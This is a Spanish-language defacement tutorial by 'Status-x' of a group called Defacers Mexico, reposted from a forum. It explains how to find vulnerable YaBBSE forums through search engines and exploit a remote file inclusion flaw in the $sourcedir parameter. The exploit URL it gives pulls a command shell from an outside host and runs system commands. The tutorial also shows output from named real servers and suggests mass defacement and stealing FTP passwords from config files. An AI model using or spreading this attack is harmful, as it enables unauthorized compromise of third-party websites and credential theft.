*############################################################
Deface en Yabbse Forums by Status-x [ phr4xz @gmail.com ]
Para ver los enlaces debes ser usuario
Crear Usuario o
Hacer Sesion #############################################################
\ Introduccion /
-------------------------------------------------------------
Dos tutoriales casi seguidos
hehehehe espero que les
ayude bastante esta tecnica es poco usada debido a que es algo
vieja y a que es algo dificil encontrar sitios que sean
no vulnerables a la inyeccion sino a poder hacerles un deface
por favor no cambie creditos y distribuyan los textos tanto
como puedan
Gracias
\ Buscando Victimas /
-------------------------------------------------------------
Para buscar victimas recomiendo usar todos los buscadores que
sepan usar y en criterio de busqueda pongan lo siguiente:
YaBBi SE v1.1
Y haber que les resulta, tambien pueden buscar por foros yabbse
tengo entendido que otras versiones tambien son vulnerables
asi que no se desanimen
\ Explorando Bug /
-------------------------------------------------------------
El fallo se encuentra en los archivos del directorio Sources
en la variable $sourcedir, asi que ahora veamos lo que denomi
naremos a partir de hoy como string
#########################################################################
Para ver los enlaces debes ser usuario
Crear Usuario o
Hacer Sesion Packages.php?sourcedir=http://derf.hpgvip.com.br/newcmd.gif?&
cmd=uname%20-a;pwd;id
#########################################################################
Y nos mostrara nuevamente los datos del servidor, veamos un
ejemplo real:
#########################################################################
Para ver los enlaces debes ser usuario
Crear Usuario o
Hacer Sesion Packages.php?sourcedir=http://derf.hpgvip.com.br/newcmd.gif?&
cmd=id;%20uname%20-a;%20pwd
#########################################################################
Y otro mas para que no digan que luego nada mas pongo un ejemplo
#########################################################################
Para ver los enlaces debes ser usuario
Crear Usuario o
Hacer Sesion Packages.php?sourcedir=http://derf.hpgvip.com.br/newcmd.gif?&
cmd=uname -a;pwd;id
#########################################################################
En el primero me da este resultado:
############################################################
uid=32004(kremlin) gid=32004(kremlin) groups=32004(kremlin)
Linux legolas.maxiwebhosting.com 2.4.20-28.9 #1 Thu Dec 18
13:46:42 EST 2003 i686 athlon i386 GNU/Linux
/home/kremlin/public_html/yabbse/Sources
############################################################
Vemos que es vulnerable a un deface en el index y a un mass defacement
y tambien podemos ver el Settings.php o Config.php del foro
y sacar el password del FTP
En el Segundo solo vemos que es vulnerable a un Mass
ojala y les sirvan
para practicar:
###########################################################
uid=99(nobody) gid=99(nobody) groups=99(nobody)
Linux venus.dnshostplan.com 2.4.20-28.8 #1 Thu Dec 18
12:53:39 EST 2003 i686 i686 i386 GNU/Linux
/home/ambr98/public_html/forum/yabbse/Sources
###########################################################
Saludos a toda la banda de mexico
\ * Despedida * /
-----------------------------------------------------------
Un tutorial mas jejeje, que espero ayude a todos ustedes
como lo anuncie en el foro proximamente una sorpresa en el
sitio que espero que les guste mucho
Recuerden promocionar la web para que cada dia crezca mas
atte: Status-x
Mail: phr4xz @gmail.com
Para ver los enlaces debes ser usuario
Crear Usuario o
Hacer Sesion ###########################################################
Copyright 2005 - Defacers Mexico 2005 - phr4xz @gmail.com
Para ver los enlaces debes ser usuario
Crear Usuario o
Hacer Sesion ###########################################################
Autor: Status-x
Autor